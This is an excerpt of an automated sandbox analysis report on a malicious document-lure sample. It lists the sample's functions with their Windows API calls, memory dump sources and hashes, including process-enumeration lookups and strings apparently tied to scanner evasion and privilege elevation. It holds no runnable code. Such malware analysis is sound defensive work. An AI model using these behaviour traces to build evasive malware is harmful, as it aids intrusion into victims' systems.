                                                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2796650324-0
                                                                                                                                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                  • Instruction ID: 29944795b6e174aeef18392e87be50a0c47e059fcb2a2432bd522ca6f333b214
                                                                                                                                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                  • Instruction Fuzzy Hash: 57E06D71E003148FCB10DE9CD8D0B4633D8AB48750F450961ED58CF246D7B0D9108BD0
                                                                                                                                                  Function 029A7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029A7DF4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                  • Instruction ID: 19050656a804adefad3d059fbe01669ed3f6b8f11629e48de5eb487fd1c7fa94
                                                                                                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                  • Instruction Fuzzy Hash: 31D05BB23093507AE624965A5D44EEB5BDCCBC6770F11063DF558C7180D7208C01C6B1
                                                                                                                                                  Function 029BADB8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  • Process32First.KERNEL32(?,00000128), ref: 029BADC9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2774106396-0
                                                                                                                                                  • Opcode ID: 37e87b31df963909330e14da229f09f4e5911dc2002548491c8e095a6cab17eb
                                                                                                                                                  • Instruction ID: 649ec80f0472b4314062ba7992304ce371616ac22afb4b79e01c86d327b79140
                                                                                                                                                  • Opcode Fuzzy Hash: 37e87b31df963909330e14da229f09f4e5911dc2002548491c8e095a6cab17eb
                                                                                                                                                  • Instruction Fuzzy Hash: FFC08072711230178B1076F93D845D3874DCD851B73040462F508D3101DB158C1091D0
                                                                                                                                                  Function 029BADD8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 029BADE9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2237597116-0
                                                                                                                                                  • Opcode ID: 5474e0b085cf2acd618d9dee476e6aa8108b3b5e58a7e2fb15bb5a4215e3f956
                                                                                                                                                  • Instruction ID: 3af475e15907af325e7c23fb44c1374979c3146a8d0b1205ad69ac205d6b05e7
                                                                                                                                                  • Opcode Fuzzy Hash: 5474e0b085cf2acd618d9dee476e6aa8108b3b5e58a7e2fb15bb5a4215e3f956
                                                                                                                                                  • Instruction Fuzzy Hash: 2AC08CA27122301B8A2076F93E889E3878DCD8A2B730448A2F508E3102DF268C1092E0
                                                                                                                                                  Function 029A7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,029C356F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,Initialize), ref: 029A7E8B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                  • Instruction ID: 33c5086e3730b34abb0eeec0d98d3c575de34ce6973c41bebd15006ff097a4d0
                                                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                  • Instruction Fuzzy Hash: 7BC08CF22113000E5E60A9FC1CE92ADA28D19C41357742E21E438CA2E1D316982328A0
                                                                                                                                                  Function 029A7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                  • Instruction ID: 5200e24bd57cf557206d324b838ecb86acae355b230dc62c763306ad9360ab75
                                                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                  • Instruction Fuzzy Hash: 2EC08CA12013002E9E5069FC2CED28D528E19842393781A31A438C62F2D32298A32890
                                                                                                                                                  Function 029A4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                  • Instruction ID: 87e0f9b6e245013621d5e58706dce9b149af9c72c9d3408b6d4066b11d481394
                                                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                  • Instruction Fuzzy Hash: EBC012A660033057EF615A99ACD079262DCDB45394F1400A19408D7251E3A0D80046E0
                                                                                                                                                  Function 029CC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,029CC350,00000000,00000001), ref: 029CC36C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Eventtime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2982266575-0
                                                                                                                                                  • Opcode ID: 1132a67bbce875a4de89e4abcd5b35b8b46bce6de7284edb7f9d95ebe154b168
                                                                                                                                                  • Instruction ID: c0268f04de20904b99d21523d373343ff539204b3a27c5c318ff067b5db8aefd
                                                                                                                                                  • Opcode Fuzzy Hash: 1132a67bbce875a4de89e4abcd5b35b8b46bce6de7284edb7f9d95ebe154b168
                                                                                                                                                  • Instruction Fuzzy Hash: ABC092F17903003AFA1096A56CD2F331ADDD785B50F600416B709EE2C1D6E768104EA8
                                                                                                                                                  Function 029A4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 029A4C3F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2525500382-0
                                                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                  • Instruction ID: 82039278b19f63ace2295586460b0448b092a9648e935828d58e5399ac3a5e90
                                                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                  • Instruction Fuzzy Hash: 17B0123820830165FB1823620F317F3005C0F80386F8520519F1CC80D1FB84C0018CF5
                                                                                                                                                  Function 029A4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 029A4C57
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                  • Instruction ID: 09a69dca7c50a57e72ad9d0a3c3ee62f8e1239e16f583f70767c13236ba3db8e
                                                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                  • Instruction Fuzzy Hash: 2EA022AC0003038A8F0B332C00300AF223BBFC03003C8C0E80A280A000CF3AC000ACF0
                                                                                                                                                  Function 029A15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029A1A03,?,029A2000), ref: 029A15E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 7c096e0fa0f806d3c735b84fde3d54f4ddc6f09522e31e9ce0935534dd45f57f
                                                                                                                                                  • Instruction ID: f886976d2243d9a4891a3c7a3867a2ba2579787e9fc8283324ed8cde2e6055f4
                                                                                                                                                  • Opcode Fuzzy Hash: 7c096e0fa0f806d3c735b84fde3d54f4ddc6f09522e31e9ce0935534dd45f57f
                                                                                                                                                  • Instruction Fuzzy Hash: 45F049F0B413008FDB19CFBD99503117AE6E78E344F158579D609DB788EB71C40A8B40
                                                                                                                                                  Function 029A1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029A2000), ref: 029A16A4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: f474bf7c5bed2b15c7faff0b55fa7cf2830c3b990b81679cb6ba05f6962f744c
                                                                                                                                                  • Instruction ID: 72192cb8c8f70fd0e03034cd7c40ceda5279088328fbecad4d9ec19049bb4104
                                                                                                                                                  • Opcode Fuzzy Hash: f474bf7c5bed2b15c7faff0b55fa7cf2830c3b990b81679cb6ba05f6962f744c
                                                                                                                                                  • Instruction Fuzzy Hash: B0F0B4B2B41795ABD7209F5EAC80792BB98FB44714F050139F90C9B340DB70EC158BD4
                                                                                                                                                  Function 029A16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 029A1704
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  • Opcode ID: fe4cececf1d9e9515298da756b75357140b714c2265ca4453db9cd2746062588
                                                                                                                                                  • Instruction ID: bd7548885d6ed151e91c6a8959ee09f8da3b09e83e2a34bc9569974017e62c5e
                                                                                                                                                  • Opcode Fuzzy Hash: fe4cececf1d9e9515298da756b75357140b714c2265ca4453db9cd2746062588
                                                                                                                                                  • Instruction Fuzzy Hash: EBE0C275300301AFEB205F7E5D84B12BBDDEB88764F244876F609DB291D6A0EC148BE4

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 029BAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
